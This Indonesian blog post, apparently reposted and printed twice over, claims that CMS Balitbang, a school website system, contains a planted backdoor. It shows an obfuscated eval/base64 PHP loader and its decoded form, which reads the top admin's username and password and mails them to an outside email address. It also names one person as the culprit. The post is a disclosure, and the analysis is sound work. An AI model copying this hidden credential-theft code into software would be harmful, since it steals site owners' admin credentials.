Kali ini kami ingin membongkar skandal perogramer CMS Balitbang yang di gunakan oleh banyak lembaga pendidikan SD,SMP dan SMA/K, Sebuah sistem Model Website Sekolah yg di rancang oleh kajianwebsite.org dengan Balitbang Kemdiknas RI , hingga saat ini yang menggunakan sistem tsb berkisar 100 ribu lebih lembaga pendidikan baik SD,SMP dan SMA/K.
Awal cerita rekan kami sebut saja "Mawar" dari salah satu lembaga pendidikan ingin meningkatkan IT di lembaganya salah satunya membangun sebuah website resmi. Dari informasi yg kami dapat Mawar di tawari untuk menggunakan sistem CMS Balitbang tsb karena pemakainya sudah sangat banyak dan ada pelatihanya oleh petinggi di lembaga tsb. Mawarpun kemudian konsultasi dengan kami bagus atau tidak sistem tsb di gunakan.
Kamipun mulai menacari tahu tentang sistem CMS Balitbang tsb dari berbagai sumber dan di dapat banyak sekali penggunaya di seluruh Indonesia dan kamipun melihat ada pelatihanya juga kami berpikir wajarlah itu sistem yg bangun sekelas Kementrian, dengan keyakinan hal tsb kamipun mulai mencari dimana bisa mendapatkan CMS Balitbang tsb akhirnya ketemu dan kami download versi terbarunya "CMS Balitbang 3.5.2".
Kami mulai membentuk tim di medan terdiri dari 5 anggota, kita semua sepakat akan melakukan analisa 1 hari dengan sistem tsb. Hari berikutnya pun tiba, semua anggota sudah siap menyapaikan hasilnya.
1. Di temukan sebuah bug upload yg sangat berbahaya di versi sebelumnya versi 3.4
2. Ini yg kami tidak habis pikir, terdapat celah yg sengaja di buat oleh sang programer di semua versi termasuk versi CMS Balitbang 3.5.2.
Pembahasan:
1. Masalah bug itu wajar namanya sistem tidak ada yg sempurna dan walau sempat menjadi target oleh kawan2 yg jahil untuk melakukan hacking di sistem tsb "anda bisa cek di google banyak sekali tutor hack sistem tsb" tapi masalah bug ini selesai setelah di rilis versi terbarunya.
2. Hal yg paling kami sorot adalah hal yg ke dua ini tentang penanaman backdor/celah oleh sang programer, sebenarnya kami sering menumukan hal seperti ini di banyak CMS yg pernah kami teliti, tapi yg membuat kami mengelus dada adalah ini sistem yg di rancang bersama Kemdiknas RI.
Hal Teknik :
Jadi inti nya di sistem tsb telah di taruh sebuah file yg di rancang untuk mengirim User dan Password dari admin yg memakai sistem tsb ke salah satu email.
Kami sebut saja filenya bernama "admin2.php" di letakan di folder "functions"
Kode yg terdapat dalam file tsb sebagai berikut:
=====
<?php eval(gzinflate(base64_decode(base64_decode("RFpSSHpxTllBSVN2MHBwVnQxZ1FIbEdqWHBEQkpKTU5teEg0RVEwbXg5UFBmNEdTcXVxcitsWHNXZmU3dXB0djJXVnI4VHZQbG9JbS80UEZlNERGNzM5ZXFXZk85RUlvK2d2MTE4aHpXS3ZYcEhoeW1yWldQSjFSRUV2akpsY01aT2ZRL2FBV0xHTTNBY3o4azByQWFBQU9uV05raXFnT3pRQU5oaHlkWHgzK1BPTXVRL3NNTFo3NU5qSG9qbzdSU1FlODFMSDRxT0dpNzFDT2N3U2E2VXJTR2o3ZFVqNlhzNDdRZ1BMRklER0k1bmpxbEdxaTVhZkIrWTFDTFdja3NuNTcrdHJzNGpmNTBmSzRNL0hzaWxYVTEycW8wcmxvNFdJNVcvQUxFcVIwK2krM1B5MHRLSEMvbnRTNXVKZ3VEMmVEMXo0UjViOTdaU3NYVTJkWlVxWlR4UHpJOVBnRkErRHEwbjdsWmN4d0laTHhjMUQ2TmtvZ2hyUnc5bE01eVZSQko5SWNobytSUjRIRVVMeGNHRU5WcHI0SXovMFIxY2JzN3RHRmNaNjk2aFdLTzBaangzRWpnTDYydnlkVW8xWjFuWE5udHpnZ1JvUFBNbTVwbENseHZmZlo4b3phY1JDOEgxRmZ0RmJ4amh1VFlRMGdDdjZ6dllPSm1pOVAvM3JEdGdycWF0NHpPbmhQNUZJWlJubUZrL213aVAzd1dRL3l5NWhXYXRaNTFyYXQyWU4yQnFFSjlRK3h0Z2ZlNjJpSWlhVlliTHU3Uys0NTc5L3FTclJrMWw2N21ZVVpaZnZ4WGR3VzlzNUwzNjllV1YwMThKc0NhdW9Xb0kranIrVnBzV2JwRFU3VmMvUHhaWTVCR3VQdWlVYjVqV1BXai9CbWQ0KzJydSt2cVVsTnIvQmVtVG9FR1RGVTBSKzZoemRyRXIrUFVZL3FFbmx6V3l1TXVWY3J2TmlGL0VPTzR1ODlSUXdYTlZXK0JBWmttVUEveHNVTm85QWE1UHRLK05hNTB3QkhrVG9mN1NkUmt0VnNZWWRLdkdOVzcxT3V1VWxFRkFUSzZLTVhFR3I5bU80ZjROYWhSUVBmZW94cElHK1lQQ0xjeHpRcjdSbzNCOGQzQnRHSEx3aFVpelg0N25NdTBpSThzVlRJZ0ZQek01TUpZVEhOaE0wTXZNQmxTd3BtRmVuZ001cUx3OTc3VmFFWG5hVnpFN3NmanlYR3NFRkNXRXhDSVpNNGluUVcyOUJjYTZjK3lKZ2ZQdTdUa0VsVENkbXh3cDFCWDRrSHFEZGNqWGFGbnJ1cy9Na1V3enJNZ0laQXRHckJSSTNQZTFoV09YS3ppdklnRUxiaG1jQVdoNFZsRjA0TzlLNTNKbG41NllWL1VXM3Q3bm5WYzNQb3VpUVp0cmtINUo0QmhoZFRQdmRVOWxTTDRGVStJQXpTNVdNckdiQU03ZU5XY1c0ekNHS1FaR1V4UHZ4S283UkkzUXZZWEhEUUV5OERJQTR2S2pxNzczWFVZZTBIYkRIbWRydGszeGJGTE9yWkJlS1JMQkRLV0FQZ0o3c0xQNTcxOHo2MDdmZ0FqZEI5YVhsN0h1MkVQYnhodHhnWDZsZGEyeHlVWUtadEVFZFJUNW9XWTkvc0pVOFpTZHB0UFBKSUZXMUYxUmFrMTJnK1hUSnZKWk9HMWJpQ2d5cGR2VnVvVkkybW9lSXQ2b3A1bmNPSHJWQS9zMmVFbjhYWU44dTVFcmVHUDdCMTdCM3Q4Mk5JSXBEaGxWSkVBaXNDcTBzYm1CNFIySEliTStFSVVhT1Z4eVVSN2U5MFlJKzUvcExtNTBWdmt0U25MazNvSFE5bHFBaVdTRGtadGZicTZWQm91WXhuVEFudklCanRKR3hXaGJQYmgySWdZZ2dJbjh6Zm90U1VDYXFjQzNDMWZtTHE4Tm1rOUlzNkVKdS84WVZHWTcrYlpBR2JGMDhmMDdZc0lMTEpEVVVrTjcyUXV6eldGOGFvcFdaK3hEdEs0dG5VVnU1cVorNlE4NS9EQ3dqdkRLWE10czhMbzlmWWRCYXhCRDY1dk5IY3VSTVd6Q2RjdW9ocWpTNVJpQ0dxUFdhT05hUU5KaTRzek5OeUhOMDV4SUxYaEFnbVpSeEVRSUYyUXp3NVU5SWU5dEVmUDV3QTEwR3I3Uk1BUHczZG1YYmJ6WnBDbVgxc2pubHlJdDRvV1VmK3VKT2haYXF1K2VVU2F0OXRrbEZmQm9FMFRNRU9uK2M4eUNKcWJRMytiaUluVGNqYmhGTWdkekI1Y09wWGtsN2YwMU9McWtRaFZPQ0I3UGNaamFDZ3dwNURLWTNqWUxIdkJEcmZQeVBuajc5Ly8vbno1OCsvdi80SA==")))); ?>
=======
Terlhiat sangat jelas sang programer sengaja merahasiakan isi kode script yg asli dengan meng'enkripsi seperti yg terlihat di atas. Kamipun berusaha cari tahu apa yg ada di balik kode tsb dengen mencoba mendecrypt code tsb tapi kok masih ter'encrypt ....... ?? ternyata sang programer sengaja membuat encrypt tsb samapi 7 kali perulangan :D itu mungkin di lakukan untuk mengecoh bila ada yg ingin mendecrypt
Hasil Decrypt:
=======
include "koneksi.php";
include "fungsi_pass.php";
data = "";
$query="select userid, count(menu) as jum from user_level group by userid order by jum desc "; $alan=mysql_query($query) or die ("query gagal");
if($row=mysql_fetch_array($alan)){
$query2="select * from user where userid='$row[userid]' ";
$alan2=mysql_query($query2) or die ("query gagal");
$r=mysql_fetch_array($alan2);
$data .="top admin : $r[username] ----- Password : ".unhex($r[password],82)."";
}
$data .= "";
$email = unhex("64gbfc1b580c1c1bab3cb92848abfc4c0b3beb3",82);
$headers = "From: \"Komunitas $nmsekolah\" <$webmail>\r\n";
$headers .= "Content-type: text/html\r\n";
mail($email, "Komunitas $nmsekolah :: Pesan baru ::", $data, $headers);
echo "Pesan terkirim";
========
Nah itulah kode yg asli dari situ kami bisa jelasakan bahwa inti barisan kode tsb
1. Mencari data user dan password yg mempunya hak akses penuh dalam sistem tsb
2. Melakukan peracangan format email yg di sertai dari data user dan password yg di dapat tadi.
3. Menetukan email yg akan di tuju di sini email pun di ecrypt lagi :) perhatikan baris kode
- "$email = unhex("64gbfc1b580c1c1bab3cb92848abfc4c0b3beb3",82);" di encrypt menggunnkana fungsi "unhex" fungsi "unhex" itu pun di buat sendiri oleh programer. Setelah kami berusaha mendercypt di hasilkan sebuah alamat email "alanrm82@yahoo.com" itulah email tujuan nya.
4. Melakukan perintah pengiriman format email yg tadi telah di rancang dengan beserta ada user dan password sistem tsb ke email "alanrm82@yahoo.com".
++++++++++++++++++++++++++++
Dengan itu sang programer dapat setiap saat masuk ke sistem di lebih dari 100 Ribu lembaga pendidikan yg menggunakan sistem tsb secara tidak sah.
Awal cerita rekan kami sebut saja "Mawar" dari salah satu lembaga pendidikan ingin meningkatkan IT di lembaganya salah satunya membangun sebuah website resmi. Dari informasi yg kami dapat Mawar di tawari untuk menggunakan sistem CMS Balitbang tsb karena pemakainya sudah sangat banyak dan ada pelatihanya oleh petinggi di lembaga tsb. Mawarpun kemudian konsultasi dengan kami bagus atau tidak sistem tsb di gunakan.
Kamipun mulai menacari tahu tentang sistem CMS Balitbang tsb dari berbagai sumber dan di dapat banyak sekali penggunaya di seluruh Indonesia dan kamipun melihat ada pelatihanya juga kami berpikir wajarlah itu sistem yg bangun sekelas Kementrian, dengan keyakinan hal tsb kamipun mulai mencari dimana bisa mendapatkan CMS Balitbang tsb akhirnya ketemu dan kami download versi terbarunya "CMS Balitbang 3.5.2".
Kami mulai membentuk tim di medan terdiri dari 5 anggota, kita semua sepakat akan melakukan analisa 1 hari dengan sistem tsb. Hari berikutnya pun tiba, semua anggota sudah siap menyapaikan hasilnya.
1. Di temukan sebuah bug upload yg sangat berbahaya di versi sebelumnya versi 3.4
2. Ini yg kami tidak habis pikir, terdapat celah yg sengaja di buat oleh sang programer di semua versi termasuk versi CMS Balitbang 3.5.2.
Pembahasan:
1. Masalah bug itu wajar namanya sistem tidak ada yg sempurna dan walau sempat menjadi target oleh kawan2 yg jahil untuk melakukan hacking di sistem tsb "anda bisa cek di google banyak sekali tutor hack sistem tsb" tapi masalah bug ini selesai setelah di rilis versi terbarunya.
2. Hal yg paling kami sorot adalah hal yg ke dua ini tentang penanaman backdor/celah oleh sang programer, sebenarnya kami sering menumukan hal seperti ini di banyak CMS yg pernah kami teliti, tapi yg membuat kami mengelus dada adalah ini sistem yg di rancang bersama Kemdiknas RI.
Hal Teknik :
Jadi inti nya di sistem tsb telah di taruh sebuah file yg di rancang untuk mengirim User dan Password dari admin yg memakai sistem tsb ke salah satu email.
Kami sebut saja filenya bernama "admin2.php" di letakan di folder "functions"
Kode yg terdapat dalam file tsb sebagai berikut:
=====
<?php eval(gzinflate(base64_decode(base64_decode("RFpSSHpxTllBSVN2MHBwVnQxZ1FIbEdqWHBEQkpKTU5teEg0RVEwbXg5UFBmNEdTcXVxcitsWHNXZmU3dXB0djJXVnI4VHZQbG9JbS80UEZlNERGNzM5ZXFXZk85RUlvK2d2MTE4aHpXS3ZYcEhoeW1yWldQSjFSRUV2akpsY01aT2ZRL2FBV0xHTTNBY3o4azByQWFBQU9uV05raXFnT3pRQU5oaHlkWHgzK1BPTXVRL3NNTFo3NU5qSG9qbzdSU1FlODFMSDRxT0dpNzFDT2N3U2E2VXJTR2o3ZFVqNlhzNDdRZ1BMRklER0k1bmpxbEdxaTVhZkIrWTFDTFdja3NuNTcrdHJzNGpmNTBmSzRNL0hzaWxYVTEycW8wcmxvNFdJNVcvQUxFcVIwK2krM1B5MHRLSEMvbnRTNXVKZ3VEMmVEMXo0UjViOTdaU3NYVTJkWlVxWlR4UHpJOVBnRkErRHEwbjdsWmN4d0laTHhjMUQ2TmtvZ2hyUnc5bE01eVZSQko5SWNobytSUjRIRVVMeGNHRU5WcHI0SXovMFIxY2JzN3RHRmNaNjk2aFdLTzBaangzRWpnTDYydnlkVW8xWjFuWE5udHpnZ1JvUFBNbTVwbENseHZmZlo4b3phY1JDOEgxRmZ0RmJ4amh1VFlRMGdDdjZ6dllPSm1pOVAvM3JEdGdycWF0NHpPbmhQNUZJWlJubUZrL213aVAzd1dRL3l5NWhXYXRaNTFyYXQyWU4yQnFFSjlRK3h0Z2ZlNjJpSWlhVlliTHU3Uys0NTc5L3FTclJrMWw2N21ZVVpaZnZ4WGR3VzlzNUwzNjllV1YwMThKc0NhdW9Xb0kranIrVnBzV2JwRFU3VmMvUHhaWTVCR3VQdWlVYjVqV1BXai9CbWQ0KzJydSt2cVVsTnIvQmVtVG9FR1RGVTBSKzZoemRyRXIrUFVZL3FFbmx6V3l1TXVWY3J2TmlGL0VPTzR1ODlSUXdYTlZXK0JBWmttVUEveHNVTm85QWE1UHRLK05hNTB3QkhrVG9mN1NkUmt0VnNZWWRLdkdOVzcxT3V1VWxFRkFUSzZLTVhFR3I5bU80ZjROYWhSUVBmZW94cElHK1lQQ0xjeHpRcjdSbzNCOGQzQnRHSEx3aFVpelg0N25NdTBpSThzVlRJZ0ZQek01TUpZVEhOaE0wTXZNQmxTd3BtRmVuZ001cUx3OTc3VmFFWG5hVnpFN3NmanlYR3NFRkNXRXhDSVpNNGluUVcyOUJjYTZjK3lKZ2ZQdTdUa0VsVENkbXh3cDFCWDRrSHFEZGNqWGFGbnJ1cy9Na1V3enJNZ0laQXRHckJSSTNQZTFoV09YS3ppdklnRUxiaG1jQVdoNFZsRjA0TzlLNTNKbG41NllWL1VXM3Q3bm5WYzNQb3VpUVp0cmtINUo0QmhoZFRQdmRVOWxTTDRGVStJQXpTNVdNckdiQU03ZU5XY1c0ekNHS1FaR1V4UHZ4S283UkkzUXZZWEhEUUV5OERJQTR2S2pxNzczWFVZZTBIYkRIbWRydGszeGJGTE9yWkJlS1JMQkRLV0FQZ0o3c0xQNTcxOHo2MDdmZ0FqZEI5YVhsN0h1MkVQYnhodHhnWDZsZGEyeHlVWUtadEVFZFJUNW9XWTkvc0pVOFpTZHB0UFBKSUZXMUYxUmFrMTJnK1hUSnZKWk9HMWJpQ2d5cGR2VnVvVkkybW9lSXQ2b3A1bmNPSHJWQS9zMmVFbjhYWU44dTVFcmVHUDdCMTdCM3Q4Mk5JSXBEaGxWSkVBaXNDcTBzYm1CNFIySEliTStFSVVhT1Z4eVVSN2U5MFlJKzUvcExtNTBWdmt0U25MazNvSFE5bHFBaVdTRGtadGZicTZWQm91WXhuVEFudklCanRKR3hXaGJQYmgySWdZZ2dJbjh6Zm90U1VDYXFjQzNDMWZtTHE4Tm1rOUlzNkVKdS84WVZHWTcrYlpBR2JGMDhmMDdZc0lMTEpEVVVrTjcyUXV6eldGOGFvcFdaK3hEdEs0dG5VVnU1cVorNlE4NS9EQ3dqdkRLWE10czhMbzlmWWRCYXhCRDY1dk5IY3VSTVd6Q2RjdW9ocWpTNVJpQ0dxUFdhT05hUU5KaTRzek5OeUhOMDV4SUxYaEFnbVpSeEVRSUYyUXp3NVU5SWU5dEVmUDV3QTEwR3I3Uk1BUHczZG1YYmJ6WnBDbVgxc2pubHlJdDRvV1VmK3VKT2haYXF1K2VVU2F0OXRrbEZmQm9FMFRNRU9uK2M4eUNKcWJRMytiaUluVGNqYmhGTWdkekI1Y09wWGtsN2YwMU9McWtRaFZPQ0I3UGNaamFDZ3dwNURLWTNqWUxIdkJEcmZQeVBuajc5Ly8vbno1OCsvdi80SA==")))); ?>
=======
Terlhiat sangat jelas sang programer sengaja merahasiakan isi kode script yg asli dengan meng'enkripsi seperti yg terlihat di atas. Kamipun berusaha cari tahu apa yg ada di balik kode tsb dengen mencoba mendecrypt code tsb tapi kok masih ter'encrypt ....... ?? ternyata sang programer sengaja membuat encrypt tsb samapi 7 kali perulangan :D itu mungkin di lakukan untuk mengecoh bila ada yg ingin mendecrypt
Hasil Decrypt:
=======
include "koneksi.php";
include "fungsi_pass.php";
data = "";
$query="select userid, count(menu) as jum from user_level group by userid order by jum desc "; $alan=mysql_query($query) or die ("query gagal");
if($row=mysql_fetch_array($alan)){
$query2="select * from user where userid='$row[userid]' ";
$alan2=mysql_query($query2) or die ("query gagal");
$r=mysql_fetch_array($alan2);
$data .="top admin : $r[username] ----- Password : ".unhex($r[password],82)."";
}
$data .= "";
$email = unhex("64gbfc1b580c1c1bab3cb92848abfc4c0b3beb3",82);
$headers = "From: \"Komunitas $nmsekolah\" <$webmail>\r\n";
$headers .= "Content-type: text/html\r\n";
mail($email, "Komunitas $nmsekolah :: Pesan baru ::", $data, $headers);
echo "Pesan terkirim";
========
Nah itulah kode yg asli dari situ kami bisa jelasakan bahwa inti barisan kode tsb
1. Mencari data user dan password yg mempunya hak akses penuh dalam sistem tsb
2. Melakukan peracangan format email yg di sertai dari data user dan password yg di dapat tadi.
3. Menetukan email yg akan di tuju di sini email pun di ecrypt lagi :) perhatikan baris kode
- "$email = unhex("64gbfc1b580c1c1bab3cb92848abfc4c0b3beb3",82);" di encrypt menggunnkana fungsi "unhex" fungsi "unhex" itu pun di buat sendiri oleh programer. Setelah kami berusaha mendercypt di hasilkan sebuah alamat email "alanrm82@yahoo.com" itulah email tujuan nya.
4. Melakukan perintah pengiriman format email yg tadi telah di rancang dengan beserta ada user dan password sistem tsb ke email "alanrm82@yahoo.com".
++++++++++++++++++++++++++++
Dengan itu sang programer dapat setiap saat masuk ke sistem di lebih dari 100 Ribu lembaga pendidikan yg menggunakan sistem tsb secara tidak sah.
sumber > kopaci.org
Post a Comment